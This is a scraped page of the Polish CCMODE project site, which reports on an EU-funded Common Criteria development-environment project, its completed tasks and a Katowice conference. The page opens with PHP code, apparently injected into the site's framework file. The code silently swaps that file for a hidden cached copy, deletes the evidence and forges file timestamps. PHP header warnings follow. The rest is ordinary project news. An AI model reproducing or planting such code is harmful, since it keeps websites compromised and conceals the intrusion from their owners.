$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /witryny/ccmode/includes/framework.php:92) in /witryny/ccmode/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /witryny/ccmode/includes/framework.php:92) in /witryny/ccmode/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /witryny/ccmode/includes/framework.php:92) in /witryny/ccmode/libraries/joomla/session/session.php on line 426
CCMODE - Witamy

Aktualności

Zakończenie realizacji projektu

 W dniu 28 lutego 2013r. zakończono realizację projektu. Wszystkie zaplanowane we wniosku o dofinansowanie zadania projektowe zostały zrealizowane. Także zaplanowane we wniosku wskaźniki projektu zostały osiągnięte.

Osiągnięto cel główny projektu jakim było opracowanie dla polskich przedsiębiorców nowego rozwiązania w postaci metodyki budowy specjalistycznych środowisk do konstruowania, wytwarzania oraz utrzymywania produktów i systemów informatycznych zgodnie z rygorystycznymi zasadami określonymi w standardzie ISO/IEC 15408 Common Criteria.

Zaproszenie na konferencję

 

Szanowni Państwo, 

 

Serdecznie zapraszamy na konferencję organizowaną przez Instytut Technik Innowacyjnych EMAG 

w Katowicach dotyczącą projektu realizowanego w ramach Programu Operacyjnego Innowacyjna Gospodarka, Priorytet 1 – Badania i rozwój nowoczesnych technologii, Działanie 1.3 – Wsparcie projektów B+R na rzecz przedsiębiorców realizowanych przez jednostki naukowe, Poddziałanie 1.3.1 Projekty rozwojowe współfinansowanego z Unii Europejskiej w ramach Europejskiego Funduszu Rozwoju Regionalnego.

Celem konferencji jest podsumowanie wyników i prezentacja produktów kończącego się projektu „Środowisko rozwojowe produktów i systemów informatycznych o podwyższonych wymaganiach bezpieczeństwa”, określanego w skrócie angielskim akronimem CCMODE (Common Criteria compliant Modular Open IT security Development Environment).

W pierwszym dniu konferencji zostaną przedstawione wyniki projektu, program upowszechniania i zapewnienia trwałości uzyskanych rezultatów oraz omówione zostaną także możliwości zbudowania wspólnoty użytkowników standardu w Polsce i nawiązywania współpracy. Ponadto, członkowie zespołu projektowego zaprezentują architekturę i funkcjonalność komputerowego narzędzia CCMODE Tools do wspomagania procesu rozwojowego produktów informatycznych o podwyższonych wymaganiach bezpieczeństwa. Zostaną zilustrowane na przykładach następujące moduły systemu:

 • moduł EMT (ang. Environment Management Tool) przeznaczony do zarządzania środowiskiem rozwojowym;
 • generator dokumentacji GenDoc wykorzystujący wzorce projektowe do automatyzacji tworzenia materiału dowodowego;
 • komponent programowy dla narzędzia Enterprise Architect wspomagający modelowanie specyfikacji zabezpieczeń produktu informatycznego.

Na koniec zostaną przedstawione możliwości zabezpieczania danych projektowych w środowisku rozwojowym z wykorzystaniem komputerowego systemu OSCAD, przeznaczonym do zarządzania bezpieczeństwem informacji i ciągłością działania w oparciu o analizę ryzyka.

W drugim dniu omówiona zostanie organizacja doświadczalnej pracowni konstruowania produktów informatycznych SecLab tworzonej w Instytucie EMAG wraz ze zrealizowanym wdrożeniem systemu zarządzania bezpieczeństwem informacji zgodnego ze standardem ISO/IEC 27001. Zaprezentowane zostaną przykłady zastosowania komputerowego systemu CCMODE Tools do wytwarzania produktu sprzętowego w postaci czujnika przyrostu temperatury oraz do wytwarzania produktu w postaci oprogramowania.

Konferencja odbędzie się w siedzibie Instytutu Technik Innowacyjnych EMAG
w Katowicach w dniach 29 – 30 stycznia w głównej sali konferencyjnej. Zainteresowani uczestnicy konferencji będą mogli otrzymać monografię poświęconą tematyce projektu pt. „Komputerowe wspomaganie procesu rozwoju produktów informatycznych o podwyższonych wymaganiach bezpieczeństwa”.

Udział w konferencji jest bezpłatny, dla zaproszonych gości organizatorzy zapewniają poczęstunek oraz lunch. Dodatkowo dla zainteresowanych osób rezerwujemy hotel w centrum Katowic na preferencyjnych warunkach. Prosimy wpisać w formularzu zgłoszeniowym „rezerwacja miejsca noclegowego”. Koszt noclegu w hotelu „Katowice” w wysokości około 100 zł pokrywa uczestnik seminarium we własnym zakresie.

Uprzejmie proszę o potwierdzenie swojego udziału w konferencji poprzez wypełnienie załączonego FORMULARZA ZGŁOSZENIOWEGO i wysłanie go na podany w formularzu adres lub bezpośredni kontakt: adam.golabek@emag.pl , Tel. 032 2007 809, 693 711 822.

Z wyrazami szacunku,

Kierownik merytoryczny projektu

dr inż. Andrzej Białas

Załączniki:

 - Program konferencji (link)

- formularz zgłoszeniowy (link) 

Zakończenie realizacji projektu

W dniu 31 grudnia 2012 roku zakończono realizacje merytoryczną projektu „Środowisko rozwojowe produktów i systemów informatycznych o podwyższonych wymaganiach bezpieczeństwa” - CCMODE

Na podstawie wyników prac badawczo-rozwojowych została opracowana postać finalna produktów Projektu, w tym opracowano przewodnik dla wdrażających i użytkujących środowisko. Powstało  doświadczalne środowisko rozwojowe, które obecnie stało się narzędziem dalszego rozwoju i promowania produktów Projektu, a także świadczenia usług doradczych, wdrożeniowych, badawczo-rozwojowych i szkoleniowych z zakresu tematyki Projektu. Działalność środowiska ukierunkowana jest głównie na przedsiębiorców, wspomagając ich we wdrażaniu wyników Projektu. Wiedza i doświadczenie zgromadzone w trakcie realizacji Projektu powinny także służyć kreowaniu rynku na usługi certyfikacyjne i związane z tym usługi doradcze.

Niniejszy Projekt przygotowano w ten sposób, że jego rezultaty mogą być stosowane niezależnie od tego, czy krajowe władze odpowiedzialne za bezpieczeństwo informatyczne zdołają do tego czasu wdrożyć standard, czy też nie. W pierwszym przypadku korzyści mogą być większe, gdyż większa liczba firm będzie zdolna pokonać barierę certyfikacji, zaś Wnioskodawca wesprze wiedzą i doświadczeniem nie tylko te podmioty, lecz również podmioty odpowiedzialne za wdrażanie standardu w skali kraju. Oczywiście, w drugim przypadku korzyści będą mniejsze, a nasi konstruktorzy nadal będą musieli certyfikować swoje produkty zagranicą, np. w Niemczech, z tym, że będzie im łatwiej, gdyż będą mogli skorzystać z wiedzy i produktów niniejszego Projektu.

W Projekcie została zgromadzona obszerna wiedza, powstały metody działania i narzędzia do ich realizacji. Posłużenie się tymi aktywami w oddziaływaniu na środowiska przedsiębiorców, decydentów, konstruktorów, programistów, ich menadżerów, a także na podmioty zobowiązane do koordynowania wdrożenia standardu w na szczeblu krajowym, przyniosło pozytywne efekty dla upowszechnienia standardu w naszym kraju.

W ramach działań o charakterze promocyjnym w końcowej fazie Projektu powstały:

 • wersje demonstracyjne oprogramowania, prezentacje oraz broszury informacyjne dotyczące produktów Projektu,
 • rozbudowano witrynę promującą wyniki Projektu, pełniąca funkcje szkoleniowe i służąca do budowania społeczności użytkowników standardu, jak również samych produktów Projektu,

W styczniu 2013 roku zostanie zorganizowana konferencja naukowo-techniczna promująca wyniki Projektu. Także jeszcze w 2013 roku zostaną przygotowane 2-3 publikacje do czasopism naukowych oraz na naukowe konferencje krajowe i międzynarodowe min. EMTECH. 

Zakończenie realizacji Zadania 7

Z dniem 31 grudnia 2012 roku zakończono realizację ostatniego siódmego etapu Projektu „Środowisko rozwojowe produktów i systemów informatycznych o podwyższonych wymaganiach bezpieczeństwa” - CCMODE pt. „Utworzenie doświadczalnego środowiska 

 Celem zadania było wypracowanie metod i narzędzi służących do upowszechnienia wyników Projektu i zapewnienia ich trwałości po jego zakończeniu, w tym:

 • opracowanie, na podstawie wyników prac badawczo-rozwojowych Projektu, produktów finalnych w postaci gotowej do wdrażania,
 • utworzenie doświadczalnego środowiska rozwojowego, które będzie stanowiło zaplecze do promowania i rozwijania wyników niniejszego Projektu,
 • promowanie wyników Projektu na forum krajowym i międzynarodowym, wspomaganie wdrożeń u przedsiębiorców oraz stymulowanie procesu wdrażania standardu ISO/IEC 15408 w naszym kraju.
 
Celem tego zadania było również zbudowanie w naszym kraju społeczności użytkowników – wspólnoty interesów wszystkich podmiotów czerpiących korzyści ze stosowania standardu i dążących do rozwoju technologii zabezpieczeń. 
W Polsce nie wdrożono dotąd standardu ISO/IEC 15408, mimo, że było to naturalnym zobowiązaniem podczas przystępowania Polski do NATO czy Unii Europejskiej, a z którym to wdrożeniem nasi sąsiedzi uporali się już kilka lat temu. Brak własnego schematu certyfikacji, związanej z tym infrastruktury certyfikacyjnej, powoduje konieczność korzystania z usług zagranicą, zaś tu pojawia się bariera cenowa (korzystanie z zagranicznej myśli twórczej), bariera posiadania niezbędnej wiedzy, a także bariera językowa. W efekcie, żaden polski produkt lub system informatyczny nie uzyskał jeszcze certyfikatu ISO/IEC 15408, a bez certyfikatu droga dla wielu zastosowań produktów lub systemów informatycznych staje się zamknięta. Powoduje to zwiększenie dystansu naszego kraju do krajów przodujących w rozwoju technologii informatycznych. Projekt niniejszy zmierzał do zmiany tej sytuacji, gdyż stał się siłą stymulującą wdrożenie i upowszechnienie standardu w kraju. Wystąpiła tu jednak bariera kompetencyjna, gdyż Wnioskodawca może znacząco pomóc właściwym podmiotom, jednak nie może ich w tym zastąpić. 
 
W toku realizacji niniejszego zadania zostały wykonane następujące podzadania:
7.1 Przygotowanie finalnej wersji produktów Projektu
7.2 Uruchomienie doświadczalnego środowiska rozwojowego
7.3 Program upowszechnienia i zapewnienia trwałości wyników Projektu
 
Działania te koncentrowały się wokół środowiska doświadczalnego. Ważnymi narzędziami do wsparcia przedsiębiorców oraz tworzenia społeczności użytkowników była specjalistyczna witryna oraz elektroniczny biuletyn informacyjny, związane z tematyką Projektu.
Został opracowany program upowszechnienia wyników Projektu i zapewnienia ich trwałości, zakładający między innymi:
 
 • prowadzenie wielokierunkowego oddziaływania na tak zwanych użytkowników standardu, czyli głównie na:
 • potencjalnych beneficjentów Projektu (przedsiębiorców – dysponentów różnego typu środowisk rozwojowych dla produktów informatycznych i elektronicznych), poprzez przygotowanie ich do wdrożenia jego wyników,
 • ogremia odpowiedzialne za wdrożenie umowy CCRA (Common Criteria Recognition Agreement) w naszym kraju, poprzez ich wspieranie we wdrażaniu standardu, informowanie o postępach Projektu, wciąganie do współpracy,
 • nawiązanie współpracy krajowej użytkowników standardu, środowisk naukowo-badawczych, normalizacyjnych, sponsorskich (przedsiębiorcy inicjujący i finansujący procesy certyfikacji) i promowanie wiedzy dotyczącej stosowania standardu,
 • nawiązanie współpracy międzynarodowej związanej z wybranymi elementami Projektu o szczególnie innowacyjnym charakterze oraz zaangażowanie się w nurt prac nad rozwojem standardu i jego wdrożeń. 
 
Program upowszechnienia wyników Projektu i zapewnienia ich trwałości został opracowany na okres pięcioletni od zakończenia Projektu, jednak co rok będzie on aktualizowany. Musi on uwzględniać element samofinansowania tych działań, zapewnić wsparcie wdrażania wyników Projektu, utrzymywanie produktów Projektu, jak również kontynuowanie współpracy w ramach krajowej społeczności użytkowników oraz współpracy międzynarodowej. Pierwsza faza realizacji tego programu została uruchomiona i oceniona pod względem skuteczności jeszcze w ramach niniejszego Projektu, kolejne będą realizowane po jego zakończeniu. 
Wynikiem realizacji zadania 7 jest raport dokumentujący:
 
 • produkty Projektu w formie przyjaznej do wdrażania przez przedsiębiorców, 
 • przygotowanie środowiska doświadczalnego do certyfikacji,
 • program upowszechnienia i zapewnienia trwałości wyników Projektu, materiały promocyjne produktów Projektu,
 • sprawozdanie z pierwszej fazy realizacji programu upowszechnienia i zapewnienia trwałości wyników Projektu z uwzględnieniem wdrożeń, współpracy krajowej i międzynarodowej, stymulacji wdrożenia standardu w kraju oraz budowy społeczności użytkowników standardu.
 
W lutym 2013 roku zostanie opracowany raport końcowy z projektu, który wraz z końcowym wnioskiem o płatność zakończy formalnie realizacje projektu. 
 

 

Zakończenie realizacji zadania nr 6

 Równocześnie z zadaniem 5 zakończono realizację zadania 6 Projektu „Środowisko rozwojowe produktów i systemów informatycznych o podwyższonych wymaganiach bezpieczeństwa” - CCMODE pt. „Walidacja narzędzia do wspomagania zarządzania środowiskiem rozwojowym”. 

Celem głównym zadania była walidacja końcowa narzędzia w warunkach zbliżonych do rzeczywistych i z udziałem potencjalnych odbiorców Projektu. W toku tej walidacji zostało zbadane, czy opracowane narzędzie programowe spełnia oczekiwania i wymagania potencjalnych odbiorców Projektu w zakresie wspomagania zarządzania środowiskiem rozwojowym. Zostały sformułowane wnioski dotyczące doskonalenia i rozwoju narzędzia w przyszłości. 
 
Proces rozwoju oprogramowania do wspomagania zarządzania środowiskiem rozwojowym zakłada jego tworzenie i weryfikację w warunkach laboratoryjnych, co jest typowym sposobem postępowania. Wówczas uwaga programistów i osób testujących skupiona jest na zapewnieniu niezawodności rozwiązania oraz jego zgodności ze specyfikacją. Jest z tym związane pewne ryzyko, które należy zminimalizować. Mianowicie, należy dodatkowo spojrzeć na oprogramowanie od strony oczekiwań przyszłych użytkowników i sprawdzić, czy proces tworzenia oprogramowania prawidłowo odzwierciedlił wyartykułowane wcześniej przez nich oczekiwania. Wymaga to zasięgnięcia opinii tych użytkowników i zbadania w jaki sposób oprogramowanie zaspokaja ich potrzeby i oczekiwania w warunkach zbliżonych do rzeczywistych, by móc jeszcze w ramach Projektu wprowadzić pewne korekty i udoskonalenia. Powyższe działania te mają charakter walidacyjny. 
Walidacja została przeprowadzona z zastosowaniem metody studium przypadku w podobny sposób, jak w zadaniu 4, z tym że jej zakres był szerszy, zaś uwaga została skupiona na ocenie narzędzia wspomagającego w kontekście całego systemu zarządzania środowiskiem rozwojowym. Zaplanowanie tego studium, instruktaż dotyczący stosowania narzędzia i ocena rezultatów walidacji zostały przeprowadzone głównie przez zespół projektowy, zaś same studium – głównie przez przedstawicieli potencjalnych beneficjentów Projektu. Wspólnie i z udziałem ekspertów zostały  ustalone kierunki doskonalenia narzędzia.
W toku realizacji niniejszego zadania zostały wykonane następujące podzadania:
 
6.1 Opracowanie planów studiów przypadku celem walidacji narzędzia wspomagającego w dwóch środowiskach rozwojowych z różnych dziedzin
 
6.2 Studium przypadku dla oprogramowania wspomagającego system zarządzania środowiskiem rozwojowym w wybranym laboratorium Wnioskodawcy
 
6.3 Studium przypadku dla oprogramowania wspomagającego system zarządzania środowiskiem rozwojowym w laboratorium firmy zainteresowanej wdrożeniem wyników Projektu
 
6.4 Podsumowanie studiów przypadku i wprowadzenie udoskonaleń narzędzia i związanej z nim metodyki
 
Wynikiem realizacji całego zadania jest raport podsumowujący wyniki walidacji końcowej.
Zakończenie Zadania 6 Projektu związane jest z osiągnięciem trzeciego kamienia milowego. Oznacza to, że istnieje już pełny, wspomagany komputerowo system środowiska rozwojowego – zarządzany przez personel wyposażony w oprogramowanie i zbiór dokumentów z przewagą elektronicznych, z ich elektronicznym obiegiem.
Środowisko rozwojowe gotowe do wdrożenia – zarządzane z wykorzystaniem komputerowego systemu wspomagania. 
 
Zakończenie realizacji zadania nr 5

 Z dniem 30 września 2012 roku zakończono realizację piątego etapu Projektu „Środowisko rozwojowe produktów i systemów informatycznych o podwyższonych wymaganiach bezpieczeństwa” - CCMODE pt. „Opracowanie narzędzia do wspomagania zarządzania środowiskiem rozwojowym”. 

Celem głównym zadania było opracowanie narzędzia w postaci oprogramowania, które będzie wspomagać działania osób odpowiedzialnych za wdrażanie, a później użytkowanie środowiska. Należy zauważyć, że proces wdrażania związany jest z gromadzeniem i przetwarzaniem różnego typu informacji dotyczących środowiska. Realizacja tych czynności z wykorzystaniem narzędzia komputerowego, pozwoli zachować te informacje w postaci elektronicznej, a potem modyfikując je, wielokrotnie wykorzystywać podczas użytkowania środowiska, opracowywać nowe dokumenty na bazie starych, gromadzić informacje o funkcjonowaniu środowiska celem jego doskonalenia, a także jego przystosowania do rozwijania w nim kolejnych produktów lub systemów informatycznych. Tego typu działania przynoszą korzyści natury podobnej do korzyści uzyskiwanych z systemów wspomagania prac inżynierskich lub procesów wytwórczych (CAD/CAM). Narzędzie podniesie efektywność procesów zarządzania środowiskiem i jego bezpieczeństwem, a przez to efektywność procesów rozwoju nowych produktów lub systemów w tym środowisku. 
Nie istnieją obecnie rozwiązania tak kompleksowe i o własnościach podobnych do otwartego środowiska rozwojowego, to znaczy oparte na wzorcach, metodyce ich wdrażania i wspomagane komputerowo. Występują pewne rozwiązania cząstkowe dotyczące generowania dokumentów zadań i profili zabezpieczeń, zarządzania dokumentami, analizy ryzyka, wspomagania zarządzania bezpieczeństwem informacji, zarządzania konfiguracją produktu, wspomagania procesu oceny itp., jednak brak rozwiązania kompleksowego dedykowanego dla środowisk, integrującego te elementy. 
 
Problem budowy narzędzia programowego rozwiązano od podstaw, zgodnie z zasadami inżynierii oprogramowania. W toku prowadzonej walidacji zgromadzono wiedzę na temat procesu wdrożeniowego i użytkowania środowiska, a także ustalono zakres komputerowego wspomagania związanych z tym czynności. 
 
W ten sposób otrzymano pełny, zwalidowany system zarządzania środowiskiem, gotowy do stosowania w sposób tradycyjny, bez specjalistycznych narzędzi wspomagających. W ramach niniejszego zadania, wiedza i doświadczenie uzyskane w toku tych badań pozwoliły na rozpoczęcie właściwych prac nad narzędziem wspomagającym czynności zarządzających środowiskiem i użytkujących, pełniących w nim różnego typu role. 
 
Zrealizowano pełny, typowy cykl rozwoju oprogramowania. Na podstawie założeń, skorygowanych na podstawie wniosków z przeglądu istniejących rozwiązań cząstkowych opracowano modele, a później prototyp i jego dokumentację wraz z testami. Przetestowano oprogramowanie, zaś na ich podstawie dokonano końcową rewizję dokumentacji. 
 
Ponowne zaproszenie do składania ofert
W związku z realizacją projektu pn. „Środowisko rozwojowe produktów i systemów informatycznych o podwyższonych wymaganiach bezpieczeństwa” ponownie zapraszamy do wzięcia udziału w bezpośredniej realizacji projektu poprzez wykonanie ekspertyzy  
z wykorzystaniem narzędzia CCMODE Tools dotyczącej oceny praktycznej metodyki wdrażania i zakresu komputerowego wspomagania zarządzania środowiskiem rozwojowym dla produktów w postaci oprogramowania (CZĘŚĆ I), sprzętowych rozwiązań elektronicznych i oprogramowania układowego (CZĘŚĆ II).    
Zgłoszenia proszę kierować na adres: abartnik@emag.pl lub abialas@emag.pl.
 
Szczegóły pod adresem: http://www.emag.pl/siwz.php?pid=75 (link) 
 

12.11.2009 

Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Rozwoju Regionalnego,

Priorytet 1: Badania i rozwój nowoczesnych technologii,

Działanie: 1.3: Wsparcie projektów B+R na rzecz przedsiębiorców realizowanych przez jednostki naukowe,

Podziałanie 1.3.1: Projekty rozwojowe.

Czas realizacji: 1 X 2009 – 30 IX 2012

Koszt realizacji: 5 558 920, 00 zł 
Nr projektu: UDA POIG 01.03.01-156/08-01   

 

 

 

 

Kto jest Online

Naszą witrynę przegląda teraz 1 gość